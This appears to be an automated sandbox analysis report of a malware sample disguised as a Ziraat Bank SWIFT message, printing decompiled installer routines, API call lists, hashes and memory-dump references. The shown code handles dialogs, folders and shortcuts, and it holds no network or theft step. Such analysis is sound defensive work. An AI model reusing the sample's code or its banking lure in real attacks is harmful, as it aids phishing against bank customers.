                                  0x00405c38
                                  0x00000000
                                  0x00405c38
                                  0x00405c23
                                  0x00405c2e
                                  0x00405c34
                                  0x00405c36
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c36
                                  0x00405bef
                                  0x00405bf2
                                  0x00000000
                                  0x00000000
                                  0x00405c01
                                  0x00405c03
                                  0x00405c05
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c05
                                  0x00000000
                                  0x00405c3b
                                  0x00405bc6
                                  0x00000000
                                  0x00405b84
                                  0x00405b89
                                  0x00405b9f
                                  0x00405ba4
                                  0x00405ba7
                                  0x00405c44
                                  0x00405c44
                                  0x00405c48
                                  0x00405c50
                                  0x00405c50
                                  0x00000000
                                  0x00405c48
                                  0x00405bb1
                                  0x00405c3f
                                  0x00405c3f
                                  0x00405c42
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c42
                                  0x00405b82
                                  0x00405b55
                                  0x00405b59
                                  0x00000000
                                  0x00000000
                                  0x00405b5b
                                  0x00405b5f
                                  0x00000000
                                  0x00000000
                                  0x00405b61
                                  0x00405b65
                                  0x00000000
                                  0x00405b67
                                  0x00405b67
                                  0x00000000
                                  0x00405b67
                                  0x00405b65
                                  0x00405cca
                                  0x00405cd4
                                  0x00405ce0
                                  0x00405ce0
                                  0x00000000

                                  APIs
                                  • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                                  • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                                  • GetWindowsDirectoryA.KERNEL32(szoimsdvi,00000400), ref: 00405BD9
                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                                  • SHGetPathFromIDListA.SHELL32(00000000,szoimsdvi), ref: 00405C23
                                  • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                                  • lstrcatA.KERNEL32(szoimsdvi,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                                  • lstrlenA.KERNEL32(szoimsdvi,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$szoimsdvi
                                  • API String ID: 900638850-2321167164
                                  • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                                  • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                                  • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                                  • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00402012() {
                                  				void* _t44;
                                  				intOrPtr* _t48;
                                  				intOrPtr* _t50;
                                  				intOrPtr* _t52;
                                  				intOrPtr* _t54;
                                  				signed int _t58;
                                  				intOrPtr* _t59;
                                  				intOrPtr* _t62;
                                  				intOrPtr* _t64;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t69;
                                  				intOrPtr* _t71;
                                  				int _t75;
                                  				signed int _t81;
                                  				intOrPtr* _t88;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t100;
                                  
                                  				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                  				_t96 = E004029E8(0xffffffdf);
                                  				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                  				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                  				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                  				if(E004055E5(_t96) == 0) {
                                  					E004029E8(0x21);
                                  				}
                                  				_t44 = _t100 + 8;
                                  				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                                  				if(_t44 < _t75) {
                                  					L13:
                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                  					_push(0xfffffff0);
                                  				} else {
                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                                  					if(_t95 >= _t75) {
                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
                                  						_t81 =  *(_t100 - 0x14);
                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                  						if(_t58 != 0) {
                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                  							_t81 =  *(_t100 - 0x14);
                                  						}
                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                  						}
                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                  						if(_t95 >= _t75) {
                                  							_t95 = 0x80004005;
                                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                                  								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                                  							}
                                  						}
                                  						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                  					}
                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                  					if(_t95 >= _t75) {
                                  						_push(0xfffffff4);
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				E00401423();
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                                  				return 0;
                                  			}





















                                  0x0040201b
                                  0x00402025
                                  0x0040202e
                                  0x00402038
                                  0x00402041
                                  0x0040204b
                                  0x0040204f
                                  0x0040204f
                                  0x00402054
                                  0x00402065
                                  0x0040206d
                                  0x0040214d
                                  0x0040214d
                                  0x00402154
                                  0x00402073
                                  0x00402073
                                  0x00402084
                                  0x00402088
                                  0x0040208e
                                  0x00402098
                                  0x0040209a
                                  0x004020a5
                                  0x004020a8
                                  0x004020b5
                                  0x004020b7
                                  0x004020b9
                                  0x004020c0
                                  0x004020c3
                                  0x004020c3
                                  0x004020c6
                                  0x004020d0
                                  0x004020d8
                                  0x004020dd
                                  0x004020e9
                                  0x004020e9
                                  0x004020ec
                                  0x004020f5
                                  0x004020f8
                                  0x00402101
                                  0x00402106
                                  0x00402118
                                  0x00402127
                                  0x00402129
                                  0x00402135
                                  0x00402135
                                  0x00402127
                                  0x00402137
                                  0x0040213d
                                  0x0040213d
                                  0x00402140
                                  0x00402146
                                  0x0040214b
                                  0x00402160
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040214b
                                  0x00402156
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                  Strings
                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 0040209D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                  • API String ID: 123533781-3107243751
                                  • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                                  • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                                  • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                                  • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E00402630(char __ebx, char* __edi, char* __esi) {
                                  				void* _t19;
                                  
                                  				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                  					E004059E3(__edi, _t6);
                                  					_push(_t19 - 0x178);
                                  					_push(__esi);
                                  					E00405A85();
                                  				} else {
                                  					 *__edi = __ebx;
                                  					 *__esi = __ebx;
                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                                  				return 0;
                                  			}




                                  0x00402648
                                  0x0040265c
                                  0x00402667
                                  0x00402668
                                  0x004027a3
                                  0x0040264a
                                  0x0040264a
                                  0x0040264c
                                  0x0040264e
                                  0x0040264e
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                                  • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                                  • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                                  • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293124501.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_19e000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                                  • Instruction ID: 7a11d267e48c677bfb609aeecceadc649386fb4a4bb21366ad91b1b9b6fc57c7
                                  • Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                                  • Instruction Fuzzy Hash: EF617A31E00218ABCF24DBA4C884BAEB7F5BF58B14F248459F915EB391EB749D01CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293124501.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_19e000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                  • Instruction ID: 58b6fa43aa5678d55ce5678e3463e5e1cfca0770a24a9adb4a76e121956a23a6
                                  • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                  • Instruction Fuzzy Hash: E011C232A00118EFDF20EBAAC8888AEF7FDEF55795B5440AAF805D3211E7309E40C660
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293124501.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_19e000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                  • Instruction ID: 9c538f1a894b9af8e6e5fb90767387a03c7577e268fe4b7880e77e32231a3cd1
                                  • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                  • Instruction Fuzzy Hash: 64E01A35764609DFCB54CBA8C981D25B3F8EB59320B154694F916C73E1EB34FE00DA50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293124501.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_19e000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                  • Instruction ID: 45f0ff8de89524e7f7e868aa45cb8c451d9b36bca0284807ab6fd484f406251e
                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                  • Instruction Fuzzy Hash: C2E0EC367115509BCB61DA69D580953F3E9FB983B172A486AF98AD7721D730FC00C660
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293124501.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_19e000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                  				struct HWND__* _v32;
                                  				void* _v84;
                                  				void* _v88;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t35;
                                  				signed int _t37;
                                  				signed int _t39;
                                  				struct HWND__* _t49;
                                  				signed int _t67;
                                  				struct HWND__* _t73;
                                  				signed int _t86;
                                  				struct HWND__* _t91;
                                  				signed int _t99;
                                  				int _t103;
                                  				signed int _t115;
                                  				signed int _t116;
                                  				int _t117;
                                  				signed int _t122;
                                  				struct HWND__* _t125;
                                  				struct HWND__* _t126;
                                  				int _t127;
                                  				long _t130;
                                  				int _t132;
                                  				int _t133;
                                  				void* _t134;
                                  
                                  				_t115 = _a8;
                                  				if(_t115 == 0x110 || _t115 == 0x408) {
                                  					_t35 = _a12;
                                  					_t125 = _a4;
                                  					__eflags = _t115 - 0x110;
                                  					 *0x42047c = _t35;
                                  					if(_t115 == 0x110) {
                                  						 *0x423ea8 = _t125;
                                  						 *0x420490 = GetDlgItem(_t125, 1);
                                  						_t91 = GetDlgItem(_t125, 2);
                                  						_push(0xffffffff);
                                  						_push(0x1c);
                                  						 *0x41f458 = _t91;
                                  						E00403E37(_t125);
                                  						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                                  						 *0x42366c = E0040140B(4);
                                  						_t35 = 1;
                                  						__eflags = 1;
                                  						 *0x42047c = 1;
                                  					}
                                  					_t122 =  *0x4091bc; // 0xffffffff
                                  					_t133 = 0;
                                  					_t130 = (_t122 << 6) +  *0x423ec0;
                                  					__eflags = _t122;
                                  					if(_t122 < 0) {
                                  						L34:
                                  						E00403E83(0x40b);
                                  						while(1) {
                                  							_t37 =  *0x42047c;
                                  							 *0x4091bc =  *0x4091bc + _t37;
                                  							_t130 = _t130 + (_t37 << 6);
                                  							_t39 =  *0x4091bc; // 0xffffffff
                                  							__eflags = _t39 -  *0x423ec4;
                                  							if(_t39 ==  *0x423ec4) {
                                  								E0040140B(1);
                                  							}
                                  							__eflags =  *0x42366c - _t133;
                                  							if( *0x42366c != _t133) {
                                  								break;
                                  							}
                                  							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
                                  							if(__eflags >= 0) {
                                  								break;
                                  							}
                                  							_t116 =  *(_t130 + 0x14);
                                  							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                                  							_push(0xfffffc19);
                                  							E00403E37(_t125);
                                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                  							_push(0xfffffc1b);
                                  							E00403E37(_t125);
                                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                                  							_push(0xfffffc1a);
                                  							E00403E37(_t125);
                                  							_t49 = GetDlgItem(_t125, 3);
                                  							__eflags =  *0x423f2c - _t133;
                                  							_v32 = _t49;
                                  							if( *0x423f2c != _t133) {
                                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                  								__eflags = _t116;
                                  							}
                                  							ShowWindow(_t49, _t116 & 0x00000008);
                                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                  							E00403E59(_t116 & 0x00000002);
                                  							_t117 = _t116 & 0x00000004;
                                  							EnableWindow( *0x41f458, _t117);
                                  							__eflags = _t117 - _t133;
                                  							if(_t117 == _t133) {
                                  								_push(1);
                                  							} else {
                                  								_push(_t133);
                                  							}
                                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                  							__eflags =  *0x423f2c - _t133;
                                  							if( *0x423f2c == _t133) {
                                  								_push( *0x420490);
                                  							} else {
                                  								SendMessageA(_t125, 0x401, 2, _t133);
                                  								_push( *0x41f458);
                                  							}
                                  							E00403E6C();
                                  							E00405A85(0x420498, 0x4236a0);
                                  							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                                  							SetWindowTextA(_t125, 0x420498);
                                  							_push(_t133);
                                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                  							__eflags = _t67;
                                  							if(_t67 != 0) {
                                  								continue;
                                  							} else {
                                  								__eflags =  *_t130 - _t133;
                                  								if( *_t130 == _t133) {
                                  									continue;
                                  								}
                                  								__eflags =  *(_t130 + 4) - 5;
                                  								if( *(_t130 + 4) != 5) {
                                  									DestroyWindow( *0x423678);
                                  									 *0x41fc68 = _t130;
                                  									__eflags =  *_t130 - _t133;
                                  									if( *_t130 <= _t133) {
                                  										goto L58;
                                  									}
                                  									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                                  									__eflags = _t73 - _t133;
                                  									 *0x423678 = _t73;
                                  									if(_t73 == _t133) {
                                  										goto L58;
                                  									}
                                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                  									_push(6);
                                  									E00403E37(_t73);
                                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                  									ScreenToClient(_t125, _t134 + 0x10);
                                  									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                  									_push(_t133);
                                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                  									__eflags =  *0x42366c - _t133;
                                  									if( *0x42366c != _t133) {
                                  										goto L61;
                                  									}
                                  									ShowWindow( *0x423678, 8);
                                  									E00403E83(0x405);
                                  									goto L58;
                                  								}
                                  								__eflags =  *0x423f2c - _t133;
                                  								if( *0x423f2c != _t133) {
                                  									goto L61;
                                  								}
                                  								__eflags =  *0x423f20 - _t133;
                                  								if( *0x423f20 != _t133) {
                                  									continue;
                                  								}
                                  								goto L61;
                                  							}
                                  						}
                                  						DestroyWindow( *0x423678);
                                  						 *0x423ea8 = _t133;
                                  						EndDialog(_t125,  *0x41f860);
                                  						goto L58;
                                  					} else {
                                  						__eflags = _t35 - 1;
                                  						if(_t35 != 1) {
                                  							L33:
                                  							__eflags =  *_t130 - _t133;
                                  							if( *_t130 == _t133) {
                                  								goto L61;
                                  							}
                                  							goto L34;
                                  						}
                                  						_push(0);
                                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                  						__eflags = _t86;
                                  						if(_t86 == 0) {
                                  							goto L33;
                                  						}
                                  						SendMessageA( *0x423678, 0x40f, 0, 1);
                                  						__eflags =  *0x42366c;
                                  						return 0 |  *0x42366c == 0x00000000;
                                  					}
                                  				} else {
                                  					_t125 = _a4;
                                  					_t133 = 0;
                                  					if(_t115 == 0x47) {
                                  						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                                  					}
                                  					if(_t115 == 5) {
                                  						asm("sbb eax, eax");
                                  						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                                  					}
                                  					if(_t115 != 0x40d) {
                                  						__eflags = _t115 - 0x11;
                                  						if(_t115 != 0x11) {
                                  							__eflags = _t115 - 0x111;
                                  							if(_t115 != 0x111) {
                                  								L26:
                                  								return E00403E9E(_t115, _a12, _a16);
                                  							}
                                  							_t132 = _a12 & 0x0000ffff;
                                  							_t126 = GetDlgItem(_t125, _t132);
                                  							__eflags = _t126 - _t133;
                                  							if(_t126 == _t133) {
                                  								L13:
                                  								__eflags = _t132 - 1;
                                  								if(_t132 != 1) {
                                  									__eflags = _t132 - 3;
                                  									if(_t132 != 3) {
                                  										_t127 = 2;
                                  										__eflags = _t132 - _t127;
                                  										if(_t132 != _t127) {
                                  											L25:
                                  											SendMessageA( *0x423678, 0x111, _a12, _a16);
                                  											goto L26;
                                  										}
                                  										__eflags =  *0x423f2c - _t133;
                                  										if( *0x423f2c == _t133) {
                                  											_t99 = E0040140B(3);
                                  											__eflags = _t99;
                                  											if(_t99 != 0) {
                                  												goto L26;
                                  											}
                                  											 *0x41f860 = 1;
                                  											L21:
                                  											_push(0x78);
                                  											L22:
                                  											E00403E10();
                                  											goto L26;
                                  										}
                                  										E0040140B(_t127);
                                  										 *0x41f860 = _t127;
                                  										goto L21;
                                  									}
                                  									__eflags =  *0x4091bc - _t133; // 0xffffffff
                                  									if(__eflags <= 0) {
                                  										goto L25;
                                  									}
                                  									_push(0xffffffff);
                                  									goto L22;
                                  								}
                                  								_push(_t132);
                                  								goto L22;
                                  							}
                                  							SendMessageA(_t126, 0xf3, _t133, _t133);
                                  							_t103 = IsWindowEnabled(_t126);
                                  							__eflags = _t103;
                                  							if(_t103 == 0) {
                                  								goto L61;
                                  							}
                                  							goto L13;
                                  						}
                                  						SetWindowLongA(_t125, _t133, _t133);
                                  						return 1;
                                  					} else {
                                  						DestroyWindow( *0x423678);
                                  						 *0x423678 = _a12;
                                  						L58:
                                  						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
                                  							ShowWindow(_t125, 0xa);
                                  							 *0x421498 = 1;
                                  						}
                                  						L61:
                                  						return 0;
                                  					}
                                  				}
                                  			}






























                                  0x0040396d
                                  0x00403976
                                  0x00403ab7
                                  0x00403abb
                                  0x00403abf
                                  0x00403ac1
                                  0x00403ac6
                                  0x00403ad1
                                  0x00403adc
                                  0x00403ae1
                                  0x00403ae3
                                  0x00403ae5
                                  0x00403ae8
                                  0x00403aed
                                  0x00403afb
                                  0x00403b08
                                  0x00403b0f
                                  0x00403b0f
                                  0x00403b10
                                  0x00403b10
                                  0x00403b15
                                  0x00403b1b
                                  0x00403b22
                                  0x00403b28
                                  0x00403b2a
                                  0x00403b6a
                                  0x00403b6f
                                  0x00403b74
                                  0x00403b74
                                  0x00403b79
                                  0x00403b82
                                  0x00403b84
                                  0x00403b89
                                  0x00403b8f
                                  0x00403b93
                                  0x00403b93
                                  0x00403b98
                                  0x00403b9e
                                  0x00000000
                                  0x00000000
                                  0x00403ba9
                                  0x00403baf
                                  0x00000000
                                  0x00000000
                                  0x00403bb8
                                  0x00403bc0
                                  0x00403bc5
                                  0x00403bc8
                                  0x00403bce
                                  0x00403bd3
                                  0x00403bd6
                                  0x00403bdc
                                  0x00403be1
                                  0x00403be4
                                  0x00403bea
                                  0x00403bf2
                                  0x00403bf8
                                  0x00403bfe
                                  0x00403c02
                                  0x00403c09
                                  0x00403c09
                                  0x00403c09
                                  0x00403c13
                                  0x00403c25
                                  0x00403c31
                                  0x00403c36
                                  0x00403c40
                                  0x00403c46
                                  0x00403c48
                                  0x00403c4d
                                  0x00403c4a
                                  0x00403c4a
                                  0x00403c4a
                                  0x00403c5d
                                  0x00403c75
                                  0x00403c77
                                  0x00403c7d
                                  0x00403c92
                                  0x00403c7f
                                  0x00403c88
                                  0x00403c8a
                                  0x00403c8a
                                  0x00403c98
                                  0x00403ca8
                                  0x00403cb9
                                  0x00403cc0
                                  0x00403cc6
                                  0x00403cca
                                  0x00403ccf
                                  0x00403cd1
                                  0x00000000
                                  0x00403cd7
                                  0x00403cd7
                                  0x00403cd9
                                  0x00000000
                                  0x00000000
                                  0x00403cdf
                                  0x00403ce3
                                  0x00403d08
                                  0x00403d0e
                                  0x00403d14
                                  0x00403d16
                                  0x00000000
                                  0x00000000
                                  0x00403d3c
                                  0x00403d42
                                  0x00403d44
                                  0x00403d49
                                  0x00000000
                                  0x00000000
                                  0x00403d4f
                                  0x00403d52
                                  0x00403d55
                                  0x00403d6c
                                  0x00403d78
                                  0x00403d91
                                  0x00403d97
                                  0x00403d9b
                                  0x00403da0
                                  0x00403da6
                                  0x00000000
                                  0x00000000
                                  0x00403db0
                                  0x00403dbb
                                  0x00000000
                                  0x00403dbb
                                  0x00403ce5
                                  0x00403ceb
                                  0x00000000
                                  0x00000000
                                  0x00403cf1
                                  0x00403cf7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403cfd
                                  0x00403cd1
                                  0x00403dc8
                                  0x00403dd4
                                  0x00403ddb
                                  0x00000000
                                  0x00403b2c
                                  0x00403b2c
                                  0x00403b2f
                                  0x00403b62
                                  0x00403b62
                                  0x00403b64
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403b64
                                  0x00403b31
                                  0x00403b35
                                  0x00403b3a
                                  0x00403b3c
                                  0x00000000
                                  0x00000000
                                  0x00403b4c
                                  0x00403b54
                                  0x00000000
                                  0x00403b5a
                                  0x00403988
                                  0x00403988
                                  0x0040398c
                                  0x00403991
